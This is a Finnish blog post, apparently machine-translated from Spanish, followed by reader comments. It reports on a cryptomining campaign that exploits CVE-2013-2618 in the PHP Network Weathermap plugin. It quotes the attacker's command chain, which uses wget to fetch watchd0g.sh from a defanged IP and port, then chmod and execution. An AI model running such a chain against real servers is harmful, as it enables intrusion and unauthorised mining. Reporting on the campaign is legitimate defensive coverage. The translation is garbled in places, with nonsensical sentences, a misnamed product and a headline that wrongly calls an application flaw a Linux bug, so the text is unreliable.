Viiden vuoden Linux-virhe antaa hyökkääjille mahdollisuuden kaivaa kryptovaluuttoja

Linux-kaatuminen

Tämä on kryptovaluutta kaivosmies etätietokoneiden avulla ilman lupaa näiden omistajien joukosta on tulossa trendi. Olin jo puhunut tästä muutaman kerran täällä blogissa tämäntyyppisestä tilanteesta.

Ja se on, että tämä on jo päässyt täysin hallitsemattomaksi siitä hetkestä lähtien, kun kryptovaluutat ovat ottaneet melko merkittävän paikan ja arvonIhmiset, joilla on tarpeeksi tietoa pääsemään heidän turvallisuuttaan rikkoviin tietokoneisiin, ovat varanneet ajanhukan etsimään tärkeitä tietoja tai pankkitilejä saadakseen rahallista hyötyä.

Sen sijaan, että he tekisivät tämän, he valitsevat yksinkertaisimman asian ottamalla nämä ryhmät hallintaansa ja yhdistämällä ne kaivosverkkoon sekä muihin tehtäviin, joita he yleensä tekevät botnetin kanssa.

Tällä tavoin on yleensä enemmän numeroida sinut uudelleen, he keskittyvät vain tämän tuottamaan välittömään rahaan.

Kun ymmärrät älykkäästi markkinatrendit ja tiedät salakirjoituksen, voit saada suuria etuja.

Onko Linux todella turvallinen järjestelmä?

Monilla meistä on ajatus siitä, että Linux on melkein täydellinen suojattu käyttöjärjestelmä, todellisuudessa siinä on vielä joitain puutteita.

No onmuutama päivä TrendMicro löysi löydön, jossa paljastettu uusi virhe Linux-järjestelmissä, joka antoi hakkereille etu kryptovaluuttojen louhinnasta käyttäen Linux-palvelimia ja -koneita.

Lausunnossa blogisi kautta he kommentoivat seuraavaa:

Tapahtumien torjuntaan liittyvän seurannan avulla havaitsimme tunkeutumisyrityksiä, joiden indikaattorit pystyimme korreloimaan aiemman JenkinsMiner-haittaohjelmia käyttäneen kryptovaluutan louhintakampanjan kanssa.

Ero: tämä kampanja on kohdistettu Linux-palvelimille. Se on myös klassinen uudelleenkäytettyjen haavoittuvuuksien tapaus, koska siinä hyödynnetään vanhentunutta tietoturvavirhettä, jonka korjaustiedosto on ollut saatavilla melkein viisi vuotta.

Tässä julkaisussa analyysisi kautta onnistui tunnistamaan kärsineet sivustot tästä epäonnistumisesta se vaikuttaa pääasiassa Japaniin, Taiwaniin, Kiinaan, Yhdysvaltoihin ja Intiaan.

Hyökkäysanalyysi

Analyysin avulla kirjoittanut Trend Micro Smart Protection Network yksityiskohtaisesti kuinka hyökkääjät hyödyntävät tätä virhettä:

Tämän kampanjan operaattorit käyttivät hyväkseen CVE-2013-2618, päivitetty haavoittuvuus Camapi Network Weathermap -laajennuksessa, jota järjestelmänvalvojat käyttävät verkon toiminnan visualisointiin.

Miksi he käyttävät vanhaa tietoturva-aukkoa: Network Weathermapilla on toistaiseksi vain kaksi julkisesti ilmoitettua haavoittuvuutta, molemmat kesäkuusta 2014.

Nämä hyökkääjät voivat hyödyntää paitsi tietoturva-aukkoa, jonka hyödyntämistä on saatavilla, myös avoimen lähdekoodin työkalua käyttävissä organisaatioissa esiintyvän korjaustiedoston viivettä.

pohjimmiltaan hyökkäys tapahtuu XSS-hyökkäyksen kautta:

sääkartta-kryptominer-4

Sumea osa on hyökkäyskohde, verkkopalvelin, jossa on portti.

Tiedosto /plugins/weathermap/configs/conn.php on tiedosto, joka johtuu jatkuvasta XSS-hyökkäyksestä / plugins / sääkartta / php .

Además de yhteys. php Aluksi näemme samanlaisen HTTP-pyynnön sovellettavan sivulle nimeltä '' jäähdyttää. php ".

Salausvaluutan louhintaohjelma jaetaan haavoittuvuuden kautta PHP: n sääkartasta kohteisiin, jotka ovat Linux-palvelimia

Kuvasta näet, miten hyökkäys syntyy, ja se kuvataan seuraavasti:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Se lähettää ilmoituksen ladata tiedosto wgetillä, joka on apuohjelma, jonka melkein kaikki Linux-jakelut ovat oletusarvoisesti asentaneet.

chmod 775 watchd0g.sh

tekee tiedostosta suoritettavan

./watchd0g.sh

Mitä se lopulta tekee, on saada tiedosto toimimaan palvelimella.

Onneksi laastari on jo olemassa ( CVE-2013-2618 ) käytettävissä vikaantumiseksi ja Voit ladata sen alkaen tämä linkki

Si haluat tietää enemmän siitä tästä epäonnistumisesta voit käydä tällä linkillä.

lähde: Cryptocurrency Miner, jaettu PHP Weathermap -haavoittuvuuden kautta, kohdistaa Linux-palvelimet


5 kommenttia, jätä omasi

Jätä kommentti

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *

*

*

  1. Vastuussa tiedoista: Miguel Ángel Gatón
  2. Tietojen tarkoitus: Roskapostin hallinta, kommenttien hallinta.
  3. Laillistaminen: Suostumuksesi
  4. Tietojen välittäminen: Tietoja ei luovuteta kolmansille osapuolille muutoin kuin lain nojalla.
  5. Tietojen varastointi: Occentus Networks (EU) isännöi tietokantaa
  6. Oikeudet: Voit milloin tahansa rajoittaa, palauttaa ja poistaa tietojasi.

  1.   Miguel Mayol ja Tur dijo

    Idiootti oleminen ei ole turvallista, ja siitä huolimatta Linux säästää sinua.
    Tietoturvakorjausten päivittämättä jättäminen ei ole Linuxin vika. Se on vika, että jotkut yritykset säästävät rahaa ja palkkaavat idiootteja järjestelmänvalvojina,
    Mutta silti se havaitaan heti ja ratkaistaan ​​heti, jopa kaikki pienet tällaiset turvatapahtumat julkaistaan.

  2.   Haluan huvilan, kuten eldekoletas dijo

    Ja mikä vika Linuxilla on, että sen päivityksiä ei käytetä? GNU / Linux-kehittäjät täyttävät tehtävänsä kehittämällä ratkaisuja uusiin haavoittuvuuksiin ja asettamalla ne käyttäjien saataville. Jos lääkäri määrää influenssarokotteen etkä saa sitä, sairastut ja jäykistyy ... onko se lääkärin vika?

  3.   Guillermo dijo

    DesdeLinux no es lo que era, dos noticias seguidas con dos fallos importantes:
    1. - Kehittyviin toimittajiin he asettavat sellaisen, joka ei ole ilmainen ohjelmisto, ja he unohtavat muutkin (ne mainitaan kommenteissa).
    2. - Valtavat uutiset viruksista, kun ne vaikuttavat vain päivittämättömiin palvelimiin. Mutta jos Linuxia on päivitetty oletuksena vuosikymmenien ajan. Pelon asettamiseksi ikään kuin tarvittaisiin Windows-tyyppistä imevää virustentorjuntaa. He näyttävät yrittävän sanoa, että Linux on sama kuin Windows eikä.
    Jos vika on vanha ja se on jo korjattu, se ei ole uutinen eikä mikään. Älä pelaa Microsoftia tai virustentorjuntayrityksiä, kuten Trend Micro, Norton, Panda tai McAffee, äläkä saa maksua.
    Muuten, käytimme Trend Micro -yritystä useita vuosia yrityksessä ja se oli todellinen peruna, paska, koska sen järjestelmä sanoi, että suoritettavalla tiedostolla oli "jälkiä" viruksista (mikä voi olla virus, vaikka se olisikin ei) ja miksi se poisti sen (vei sen hakemistoon, jotta se ei toimisi), joka ei sallinut sen käyttöä, eikä sillä ollut valkoista luetteloa estämään tämän toiminnan turvallisella suoritettavalla tiedostolla, jota tarvitsimme käyttää . Mikä sotku. Se oli yritysversio, yksittäisessä versiossa oli tämä mahdollisuus sallittujen luetteloon ottamiseen. Säälittävä.

  4.   Guillermo dijo

    Älä kuvaa itseäsi niin tyylikkäästi.
    Artikkeli puhuu tietoturva-aukosta, jonka avulla voit kirjoittaa ohjelman, tehdä siitä suoritettavan ja suorittaa sen, mikä on jokaisen viruksen tarvitsema leviämisturva. Ilmeisesti virukseksi se tarvitsee, että syötetyn ohjelman koodissa on mahdollisuus skannata verkon tietokoneita toistamaan toiminto ja itsekopiointi. He eivät vain tee sellaista, koska Linuxissa löydetyt tietoturva-aukot peitetään tietoturvakorjauksella, ja tarkoitan sitä Windowsin ja Linuxin erolla, koska virustorjunta ei ole välttämätöntä, vaan aukon peittämiseksi. Windowsissa sitä on vaikeampaa useista syistä: 1.- Tiedostoista voi tulla suoritettavia yksinkertaisesti niiden laajennuksella, jolloin vaihe niiden käyttöönotosta kyseisessä tietokoneessa eliminoidaan. 2.- Käyttäjät asentavat jatkuvasti epäilyttävän alkuperän ohjelmia, koska ne ovat omistettuja ja tarvitsevat niitä maksamatta (en sano mitään, mitä kotitalouden olisi ostaa MS Office, Photoshop, ... yli kaksinkertaistamalla tietokonelaitteiden kustannukset). 3.- Ennemmin tai myöhemmin Windows huuhtelee, käyttäjä vie sen naapurille, ystävällesi ..., joka ei tuhlaa aikaa, alustaa kaiken ja asentaa Windows Ultimate -laitteen aktivointilaastarilla, jota ei ole päivitetty tai korjaustiedosto itse asettaa vakoojaohjelman. Voi olla, että se ei ole ja se on hienoa, mutta voi olla, että se on ja Windows vakoilee salasanoja. Artikkelissa he mainitsevat käyttöönottojärjestelmän linuxissa, johon haavoittuvuus vaikuttaa, joten ohjelman, joka skannaa verkon automaattisesti ja käyttää sitä itsensä kopioimiseen ja suorittamiseen palvelimella, on helpoin osa kaikkea, tästä syystä mitä on sanottu artikkeli on tärkein vaihe viruksille: järjestelmän haavoittuvuus hyökkäyksille.

  5.   hambaglio dijo

    Huono tieto. Tämä ei ole vika Linuxissa, se on vika PHP-SOVELLUKSESSA, toisin sanoen se on alustojen välinen. Se ei ole edes yksinomaan Linux-ydintä käyttäville järjestelmille! Mutta vaikka sovellus ei olisikaan rajat ylittävä, se ei olisi Linux-virhe, se olisi vain sovellus.

    Linux-ytimellä ei ole pienintäkään häiriötä suojautua tämänkaltaisilta sivustojenvälisiltä komentosarjahyökkäyksiltä. Ainakin tutki VIISI MINUTTIA ennen lähettämistä, koska totuus, että kaikille, jotka tietävät vähän jostakin, näytät huonolta.